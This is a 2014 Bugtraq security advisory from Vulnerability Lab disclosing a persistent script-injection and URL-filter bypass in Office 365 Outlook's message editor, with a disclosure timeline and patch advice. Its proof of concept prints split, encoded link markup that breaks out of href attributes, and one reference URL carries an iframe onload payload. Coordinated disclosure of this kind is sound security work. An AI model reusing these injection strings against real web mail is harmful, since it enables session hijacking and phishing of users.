
List:       bugtraq
Subject:    Microsoft Office 365 Outlook - Filter Bypass & Persistent Editor Vulnerability
From:       Vulnerability Lab <research () vulnerability-lab ! com>
Date:       2014-02-28 13:42:18
Message-ID: 5310923A.2060506 () vulnerability-lab ! com

Document Title:
===============
Microsoft Office 365 Outlook - Filter Bypass & Persistent Editor Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=811

Microsoft Security Response Center (MSRC) ID: 14095


Release Date:
=============
2014-02-28


Vulnerability Laboratory ID (VL-ID):
====================================
811


Common Vulnerability Scoring System:
====================================
4.3


Product & Service Introduction:
===============================
Office 365 primarily denotes a set of subscription based software services that require monthly or periodic payment of fees to Microsoft Corporation. By contrast, Office 20XX generally refers to a suite of desktop applications that alone by themselves are not subscription based and do not carry monthly fees.

Although Office 365 also often refers to cloud-based services rather than desktop applications, certain Office 365 subscription plans include a subscription to Office 20XX desktop applications in addition to cloud-based services. The subscription to Office 20XX desktop applications, by virtue of the subscription, makes the subscription part of an Office 365 offering.

Office 365 was initially announced in the autumn of 2010, and was made available to the public on June 28, 2011. The initial subscription plans included a Professional plan (for organizations of 25 and smaller) and an Enterprise plan (for organizations with more individuals). Microsoft also offers a Dedicated and ITAR subscription model for large companies. The Office 365 Dedicated offering isolates servers to be used for only a single customer while ITAR (AKA Federal) offers a higher level of security (individual background checks and extremely-limited access to sensitive parts of the system by knowledge workers) that complies with the ITAR standard.

Depending on the subscription plan, Office 365 can include a subscription to Office 20XX desktop applications, in addition to hosted versions of Microsoft's Server products (including Exchange Server, SharePoint Server, and Lync Server) that are delivered and accessed over the Internet, in effect, the next version of Business Productivity Online Suite (BPOS). In December 2011, Microsoft launched Trust Center and announced that Office 365 now complies with EU privacy regulations.

(Copy of the Homepage: http://en.wikipedia.org/wiki/Microsoft_Office_365)


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a filter bypass issue and persistent input validation vulnerability in the official Microsoft (cloud-based) Outlook Office 365 web-application.


Vulnerability Disclosure Timeline:
==================================
2013-02-02:	Researcher Notification & Coordination (Benjamin Kunz Mejri)
2013-02-06:	Vendor Notification (Microsoft Security Response Team - MSRC)
2013-02-07:	Vendor Response/Feedback (Microsoft Security Response Team - MSRC)
2014-02-23:	Vendor Fix/Patch (Microsoft Developer Team by Check)
2014-02-28:	Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Microsoft Corp.
Product: Office 365 (cloud-based)


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the official Microsoft (cloud-based) Outlook Office 365 web-application. The vulnerability allows remote attackers to inject their own malicious script code on the application side (persistent) of the vulnerable module.

The bug is located in the `Send Message` section, when the `Editor` module processes a request through the connected url/link insert function via the POST method. Remote attackers can inject their own malicious links using a split request to bypass the encoding and validation of the Outlook cloud form.

The second effect is that the url block filter is evaded when the public message is processed in Office 365. Exploitation of the vulnerability requires low user interaction and a low privileged application user account. The vulnerability can be exploited in all editors available in the Outlook cloud for Office 365, via reply, forward and direct message.

After the filter bypass, the persistent injected script code executes in the mail message and mail item preview list context. A second execution occurs when answering, forwarding or replying to a prepared malicious email, in the link mouseover label information. The security risk of the filter bypass and persistent input validation web vulnerability is estimated as medium(+)|(-)high with a CVSS (Common Vulnerability Scoring System) count of 5.1(+)|(-)5.2.

Successful exploitation of the vulnerability results in session hijacking, persistent Outlook mail phishing, persistent external redirects through malicious mail context on mouseovers, and persistent manipulation of affected or connected module context.

Vulnerable Section(s):
                                [+] Microsoft Corp - Office 365 (cloud-based) Application > Outlook (Cloud)

Vulnerable Module(s):
                                [+] Message Editor

Vulnerable Parameter(s):
                                [+] URL - Link

Affected Module(s):
                                [+] Message Editor (Local)
                                [+] Message Listings (Remote)

Affected Module(s):
                                [+] URL Block Filter Bypass - Mail Listing & Preview
                                [+] Edit Outlook Mail - mouseover < link


Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote and local attackers with low required user interaction and a low privileged application user account. For demonstration or reproduction ...


Review: Message Editor - URL - Link

<html dir="ltr"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<style id="owaParaStyle" type="text/css">P {margin-top:0;margin-bottom:0;}</style>
<style id="owaTempEditStyle" type="text/css">BODY {scrollbar-base-color:undefined;scrollbar-highlight-color:undefined;scrollbar-darkshadow-color:undefined;scrollbar-track-color:undefined;scrollbar-arrow-color:undefined}BODY {direction: ltr;font-family: Tahoma;color: #000000;font-size: 10pt;}</style></head>
<body ocsi="1" fpstyle="1">
<a href="http://www.restriction-bypass.com %20%20"><[PERSISTENT INJECTED SCRIPT CODE!])<">sadasdasd </a>
<a href="http://<[PERSISTENT INJECTED SCRIPT CODE!]>.com <[PERSISTENT INJECTED SCRIPT CODE!]>%20%20%20%20"><[PERSISTENT INJECTED SCRIPT CODE!]) <"><br></a><br><br>
<a href="http://www.vuln-lab.com">ptest</a><br></body></html>

Strings:
<a href="http://www.google.com%20%20%20%22%3E%3C[PERSISTENT INJECTED SCRIPT CODE!]337]%29%20%3C">https://www..outlook.com/</a>
...
<body ocsi="1" fpstyle="1"><a href="http://www.restriction-bypass.com %20%20"><[PERSISTENT INJECTED SCRIPT CODE!])<">


Note:
After the injection you can save the message and send it to another user as a mail with the document. The injected test code bypasses the url block filter as well.


Reference(s):
Editor Main - New Message
https://db3prd0411.outlook.com/owa/?ae=Item&t=IPM.Note&a=New id=RgAAAADrNObEaQpDTqiFstabwb5OBwAUN7OhArS%2bRpYIS2cjJ1O6AAAAyBsfAAAUN7OhArS%2bRpYIS2cjJ1O6AAAAyHIWAAAJ&pspid=_1356986243848_891211515


Editor Main - New Message - PreFormAction > Forward
https://db3prd0411.outlook.com/owa/?ae=PreFormAction&a=Forward&t=IPM.Task&id=RgAAAADrNObEaQpDTqiFstabwb5OBwAUN7OhArS%2bRpYIS2cjJ1O6AAAAyBsiAAAUN7OhArS%2bRpYIS2cjJ1O6AAAAyKGsAAAT&pspid=_1356988842671_885815302


https://db3prd0411.outlook.com/owa/?ae=Item&a=New&t=IPM.Appointment&mr=1&pspid=_1356989287630_946606254


Editor Main - Item > IPM.Note
https://db3prd0411.outlook.com/owa/?ae=Item&t=IPM.Note&a=New&to=%2fo%3dExchangeLabs%2fou%3dExchange%20Administrative%20Group%20%28FYDIBOHF23SPDLT%29%2fcn%3dRecipients%2fcn%3d290a6110a49548638d210cca28dbfbf9-bkms&nm=%3Ciframe%20%3Ciframe%20src%3da%3E%2520%2520%2520%2520%22%3E%3Ciframe%20src%3da%20onload%3dalert%28%22VL%22%29%20%3C&ao=2&pspid=_1356989652193_934947028


Editor Main - Reply Message
https://db3prd0411.outlook.com/owa/?ae=PreFormAction&a=Reply&t=IPM.Note&id=RgAAAADrNObEaQpDTqiFstabwb5OBwAUN7OhArS%2bRpYIS2cjJ1O6AAAAyBsfAAAUN7OhArS%2bRpYIS2cjJ1O6AAAAyHIXAAAJ&pspid=_1356990415743_595927187


Solution - Fix & Patch:
=======================
The solution is to restrict the input field of the url/link function in the editor with a secure filter mask. The vulnerability can be patched by recognizing a split injected request after the first invalid url is provoked. Also parse the editor label display output listing when processing a mouseover on a link. Correct the url block filter so that it recognizes script code injected via split POST injection requests.


Security Risk:
==============
The security risk of the persistent input validation vulnerability is estimated as medium(+)|(-)high.


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com      - www.vuln-lab.com                 - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com    - research@vulnerability-lab.com   - admin@evolution-sec.com
Section:    www.vulnerability-lab.com/dev  - forum.vulnerability-db.com       - magazine.vulnerability-db.com
Social:     twitter.com/#!/vuln_lab        - facebook.com/VulnerabilityLab    - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

				Copyright © 2014 | Vulnerability Laboratory [Evolution Security]



-- 
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com


